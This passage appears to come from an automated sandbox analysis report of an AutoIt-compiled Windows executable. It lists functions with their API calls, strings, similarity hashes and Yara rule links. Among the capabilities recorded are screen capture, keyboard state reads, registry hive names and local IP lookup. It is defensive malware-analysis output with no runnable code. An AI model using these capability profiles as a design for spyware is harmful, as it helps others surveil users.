CreateCompatibleDC.GDI32(?), ref: 00C376BA
SelectObject.GDI32(00000000,?), ref: 00C376C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C3771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C37757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C3777B
SelectObject.GDI32(00000006,?), ref: 00C37783
DeleteObject.GDI32(?), ref: 00C3778C
DeleteDC.GDI32(00000006), ref: 00C37793
ReleaseDC.USER32(00000000,?), ref: 00C3779E

Strings

(, xrefs: 00C37723

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: fcc58bb3a3126bf341497bbf66b5ed02a77fb9cbce19b1c322e341e600351417
Instruction ID: 1035457695bd6d45fbfce77e94ed282375fbd2fa9b32e7d85473729229a4365e
Opcode Fuzzy Hash: fcc58bb3a3126bf341497bbf66b5ed02a77fb9cbce19b1c322e341e600351417
Instruction Fuzzy Hash: 125138B5904209EFCB25CFA8CC85FAEBBB9FF49310F14852DF95A97210D731A9418B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00C4FB78), ref: 00C2A0FC

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00C2A11E
__swprintf.LIBCMT ref: 00C2A177
__swprintf.LIBCMT ref: 00C2A190
_wprintf.LIBCMT ref: 00C2A246
_wprintf.LIBCMT ref: 00C2A264

Strings

Line %d (File "%s"):, xrefs: 00C2A171, 00C2A18A
"%s" (%d) : ==> %s:, xrefs: 00C2A25F
"%s" (%d) : ==> %s:%s%s, xrefs: 00C2A241
Error: , xrefs: 00C2A20E
^ ERROR, xrefs: 00C2A1E8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 1d86f8ca580aa6e2d7f0414efef901ed353a53ff850756192a052ee34307f216
Instruction ID: e3bdc5317c835f6c5d34b6c3a0fb7d8ec1ecf5e26039dc8a2756134c011a4b9c
Opcode Fuzzy Hash: 1d86f8ca580aa6e2d7f0414efef901ed353a53ff850756192a052ee34307f216
Instruction Fuzzy Hash: A2517F3194011AABCF15EBE0DD86FEEB7B9AF04300F1001A9B515720A1DB316F59DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C25217 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C2521C

Part of subcall function 00BE0719: timeGetTime.WINMM(?,753DB400,00BD0FF9), ref: 00BE071D

Sleep.KERNEL32(0000000A), ref: 00C25248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00C2526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C2528E
SetActiveWindow.USER32 ref: 00C252AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C252BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C252DA
Sleep.KERNEL32(000000FA), ref: 00C252E5
IsWindow.USER32 ref: 00C252F1
EndDialog.USER32(00000000), ref: 00C25302

Strings

@U=u, xrefs: 00C252BB, 00C252DA
BUTTON, xrefs: 00C25280

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: 8cd1c90eb6c77341c0d1b06513caf7acfecab0a0be29614482aa632428425b8f
Instruction ID: e4c79eef6b9376b715f89b34b9007a30703cd883e25ec45f2186f6d9f169d3d3
Opcode Fuzzy Hash: 8cd1c90eb6c77341c0d1b06513caf7acfecab0a0be29614482aa632428425b8f
Instruction Fuzzy Hash: 00219A78204B05EFE7009B30FD88B2E3B69FB46396F202468F405825B1EBB19D419B36

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00BE0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BC6C6C,?,00008000), ref: 00BE0BB7

Part of subcall function 00BC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC48A1,?,?,00BC37C0,?), ref: 00BC48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00BC6E5A

Part of subcall function 00BC59CD: _wcscpy.LIBCMT ref: 00BC5A05

Part of subcall function 00BE387D: _iswctype.LIBCMT ref: 00BE3885

Strings

Unterminated string, xrefs: 00BFEC0D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00BFE84A
EA06, xrefs: 00BFE87B
Error opening the file, xrefs: 00BFE866, 00BFE8E1
>>>AUTOIT SCRIPT<<<, xrefs: 00BFE8BF
Bad directive syntax error, xrefs: 00BFEBC6
AU3!, xrefs: 00BC6CC1

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 5fe3ed50a95956b7bcda4c269f65368fa329de759f5e7ec667792ba7f451e496
Instruction ID: bbc13425ce652cef4e0e99cfaa723fd2b616d7a79eb3f12aec1f1d74142162e9
Opcode Fuzzy Hash: 5fe3ed50a95956b7bcda4c269f65368fa329de759f5e7ec667792ba7f451e496
Instruction Fuzzy Hash: E6029B301083419FC724EF24C891EAFBBE5EF85354F0449AEF596972A1DB30E989DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BC45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BC45F9
GetMenuItemCount.USER32(00C86890), ref: 00BFD7CD
GetMenuItemCount.USER32(00C86890), ref: 00BFD87D
GetCursorPos.USER32(?), ref: 00BFD8C1
SetForegroundWindow.USER32(00000000), ref: 00BFD8CA
TrackPopupMenuEx.USER32(00C86890,00000000,?,00000000,00000000,00000000), ref: 00BFD8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BFD8E9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 7367a14f8c7ef71b3df9e1bea822ae1c6ccb98c1035656d5dfe7ef4b52d594fb
Instruction ID: b4c81b261e2f37e8f2f2d866ed843b10bebea204e8a55e4f133298c63c9a6f4d
Opcode Fuzzy Hash: 7367a14f8c7ef71b3df9e1bea822ae1c6ccb98c1035656d5dfe7ef4b52d594fb
Instruction Fuzzy Hash: BB71F671601219BAEB319F14DC85FBABFA5FF05364F2002AAF615AB1E1C7B15C14DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C410A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C40038,?,?), ref: 00C410BC

Strings

HKEY_USERS, xrefs: 00C411BD
HKEY_CURRENT_USER, xrefs: 00C4119B
HKU, xrefs: 00C411CE
HKEY_CURRENT_CONFIG, xrefs: 00C41179
HKEY_LOCAL_MACHINE, xrefs: 00C41125
HKEY_CLASSES_ROOT, xrefs: 00C4114F
HKCC, xrefs: 00C4118A
HKCU, xrefs: 00C411AC
HKCR, xrefs: 00C41164
HKLM, xrefs: 00C4113A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: df8c201643c3cd5f0b827e3bf325a0f26e760be7d39bc0ec107735b2de25cfea
Instruction ID: 9fdd2c9b19f1c8015266158b2950381e68909caed39893a130cf174c2f726222
Opcode Fuzzy Hash: df8c201643c3cd5f0b827e3bf325a0f26e760be7d39bc0ec107735b2de25cfea
Instruction Fuzzy Hash: D441827015028E9BCF20EF91DC91BEE3764BF11310F5484A4FDA55B251DB70AE9ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C4772A Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C477CD
CreateCompatibleDC.GDI32(00000000), ref: 00C477D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C477E7
SelectObject.GDI32(00000000,00000000), ref: 00C477EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C477FA
DeleteDC.GDI32(00000000), ref: 00C47803
GetWindowLongW.USER32(?,000000EC), ref: 00C4780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C47821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C4782D

Strings

static, xrefs: 00C47765
@U=u, xrefs: 00C477E7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: @U=u$static
API String ID: 2559357485-3553413495
Opcode ID: e474b53035b8302d32087584c33434a40b66f1917d55a27aa0eb4060dfb3b9a5
Instruction ID: 76fb155d61aaff1dd19b47d4e1b682cdda8866f543844b0a3c7c5317c3a1df52
Opcode Fuzzy Hash: e474b53035b8302d32087584c33434a40b66f1917d55a27aa0eb4060dfb3b9a5
Instruction Fuzzy Hash: 54316B36105215BBDF129FA4DC08FDE3B69FF0A325F110328FA25A60A0C731D822DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C25569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

Part of subcall function 00BC7A84: _memmove.LIBCMT ref: 00BC7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C255D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C255E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C255F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C2560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C2561C

Strings

play PlayMe wait, xrefs: 00C25606
play PlayMe, xrefs: 00C25617
close PlayMe, xrefs: 00C255E3, 00C25610
alias PlayMe, xrefs: 00C255AB
open , xrefs: 00C25581
status PlayMe mode, xrefs: 00C255CD

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 8caa3cdcf1f2d526cb30abe571700a15b04a205e507be9a3599b4c9d3caae55d
Instruction ID: 53f7a2feff3d3fad4cc58d0cc6f69b557175b6d55cc4f447e8174b6264393cbc
Opcode Fuzzy Hash: 8caa3cdcf1f2d526cb30abe571700a15b04a205e507be9a3599b4c9d3caae55d
Instruction Fuzzy Hash: 2711B22169016979E720BA76DC8AEFF7BBCEFD1B00F4044A9B415A21E1DEB05E05C9B1

Uniqueness

Uniqueness Score: -1.00%

Function 00C248F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C2490E
gethostname.WSOCK32(?,00000100), ref: 00C24928
gethostbyname.WSOCK32(?), ref: 00C24935
_wcscpy.LIBCMT ref: 00C2495D
_memmove.LIBCMT ref: 00C24970
inet_ntoa.WSOCK32(?), ref: 00C2497B
_strcat.LIBCMT ref: 00C24989
_wcscpy.LIBCMT ref: 00C249A0
WSACleanup.WSOCK32 ref: 00C249AE
_wcscpy.LIBCMT ref: 00C249BC

Strings

0.0.0.0, xrefs: 00C24957

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: c9b5f760089b0b45758f4baf87575ea93510a26be643c3475138f62ae5b02b7f
Instruction ID: a6bd443a2a97dad65e6404a8468d0d23b9c3d4df3ad096a6d2ebc7ef3338c547
Opcode Fuzzy Hash: c9b5f760089b0b45758f4baf87575ea93510a26be643c3475138f62ae5b02b7f
Instruction Fuzzy Hash: B411D535904124ABDB24FB25EC0AFDF77ECEB41710F0401B9F45496091EFB49AC29691

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

CoInitialize.OLE32(00000000), ref: 00C2D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C2D8E8
SHGetDesktopFolder.SHELL32(?), ref: 00C2D8FC
CoCreateInstance.OLE32(00C52D7C,00000000,00000001,00C7A89C,?), ref: 00C2D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C2D9B7
CoTaskMemFree.OLE32(?,?), ref: 00C2DA0F
_memset.LIBCMT ref: 00C2DA4C
SHBrowseForFolderW.SHELL32(?), ref: 00C2DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C2DAAB
CoTaskMemFree.OLE32(00000000), ref: 00C2DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C2DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00C2DAEB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 5123b741fc886beae9230730fc32b86330fd9279265c5b55d11f92c52609b475
Instruction ID: 6a7d6eeb5fb3738c89bf569b6d190db3d2e732ff5c94eafee4cb6f7ae60e99cc
Opcode Fuzzy Hash: 5123b741fc886beae9230730fc32b86330fd9279265c5b55d11f92c52609b475
Instruction Fuzzy Hash: 93B1FE75A00119AFDB04DF64D888EAEBBF9FF49304B1484A9F916EB251DB30EE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C2052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C205A7
SetKeyboardState.USER32(?), ref: 00C20612
GetAsyncKeyState.USER32(000000A0), ref: 00C20632
GetKeyState.USER32(000000A0), ref: 00C20649
GetAsyncKeyState.USER32(000000A1), ref: 00C20678
GetKeyState.USER32(000000A1), ref: 00C20689
GetAsyncKeyState.USER32(00000011), ref: 00C206B5
GetKeyState.USER32(00000011), ref: 00C206C3
GetAsyncKeyState.USER32(00000012), ref: 00C206EC
GetKeyState.USER32(00000012), ref: 00C206FA
GetAsyncKeyState.USER32(0000005B), ref: 00C20723
GetKeyState.USER32(0000005B), ref: 00C20731

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d152a5df904b8293c5b7c12f18c15c9eda4ee01d71b89a0aa6d10818043d65ce
Instruction ID: 8dcce460003bbc21339a2c4c62b8943f347a4c7a66837268e334aeeed47f2fc5
Opcode Fuzzy Hash: d152a5df904b8293c5b7c12f18c15c9eda4ee01d71b89a0aa6d10818043d65ce
Instruction Fuzzy Hash: 7B513A30A047A829FB34DBB0A4507EEBFB49F11380F18459FD9D2569C3DA649B8CCB65

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C1C746
GetWindowRect.USER32(00000000,?), ref: 00C1C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C1C7B6
GetDlgItem.USER32(?,00000002), ref: 00C1C7C1
GetWindowRect.USER32(00000000,?), ref: 00C1C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C1C827
GetDlgItem.USER32(?,000003E9), ref: 00C1C835
GetWindowRect.USER32(00000000,?), ref: 00C1C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C1C889
GetDlgItem.USER32(?,000003EA), ref: 00C1C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C1C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00C1C8C1

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 74936024901562bb58392c3928487577973053be34e57bedf5d0ce5a6763075e
Instruction ID: 0ccc422bf5ebc659d1f574cfc6e052f982ef86935b21a07024b3f83393f9307c
Opcode Fuzzy Hash: 74936024901562bb58392c3928487577973053be34e57bedf5d0ce5a6763075e
Instruction Fuzzy Hash: C1513D75B40205AFDB18CFA8DD89BAEBBBAFB89310F14812DF515D6290D7709E418B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC2036,?,00000000,?,?,?,?,00BC16CB,00000000,?), ref: 00BC1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BC20D3
KillTimer.USER32(-00000001,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BC216E
DestroyAcceleratorTable.USER32(00000000), ref: 00BFBEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBF5A
DeleteObject.GDI32(00000000), ref: 00BFBF6C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: afb72d2d4a799fa079a7d3a9e1a8068fc42a1eca2a1fe8fba1f1dc21953ac4e6
Instruction ID: c1ccdfc8fc072125f4b5cfd9a3accbed5e23f767f1ac73f1a01e4f802cb17ee7
Opcode Fuzzy Hash: afb72d2d4a799fa079a7d3a9e1a8068fc42a1eca2a1fe8fba1f1dc21953ac4e6
Instruction Fuzzy Hash: 45619834200604DFDB35AF18CD88F2AB7F2FB41316F1484ADE24297AA0C775A895DF84

Uniqueness

Uniqueness Score: -1.00%

Function 00BC21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC

GetSysColor.USER32(0000000F), ref: 00BC21D3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
